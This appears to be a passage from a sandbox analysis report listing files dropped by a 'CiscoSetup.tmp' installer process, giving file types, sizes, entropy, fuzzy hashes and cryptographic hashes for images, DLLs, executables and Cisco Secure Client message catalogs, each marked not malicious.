                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328808
                                                                                                                                                                                                  Entropy (8bit):6.41821402390606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                                                                                  MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                                                                                  SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                                                                                  SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                                                                                  SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124520
                                                                                                                                                                                                  Entropy (8bit):6.630785150590808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                                                                                  MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                                                                                  SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                                                                                  SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                                                                                  SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):350819
                                                                                                                                                                                                  Entropy (8bit):5.461097780903613
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                                                                                  MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                                                                                  SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                                                                                  SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                                                                                  SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):361321
                                                                                                                                                                                                  Entropy (8bit):5.209740954129793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                                                                                  MD5:896374392BD925153CD66C80C719F912
                                                                                                                                                                                                  SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                                                                                  SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                                                                                  SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):354736
                                                                                                                                                                                                  Entropy (8bit):5.123789642260049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                                                                                  MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                                                                                  SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                                                                                  SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                                                                                  SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366110
                                                                                                                                                                                                  Entropy (8bit):5.203256685903476
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                                                                                  MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                                                                                  SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                                                                                  SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                                                                                  SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362312
                                                                                                                                                                                                  Entropy (8bit):5.179123156153952
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                                                                                  MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                                                                                  SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                                                                                  SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                                                                                  SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362333
                                                                                                                                                                                                  Entropy (8bit):5.410491653751883
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                                                                                  MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                                                                                  SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                                                                                  SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                                                                                  SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
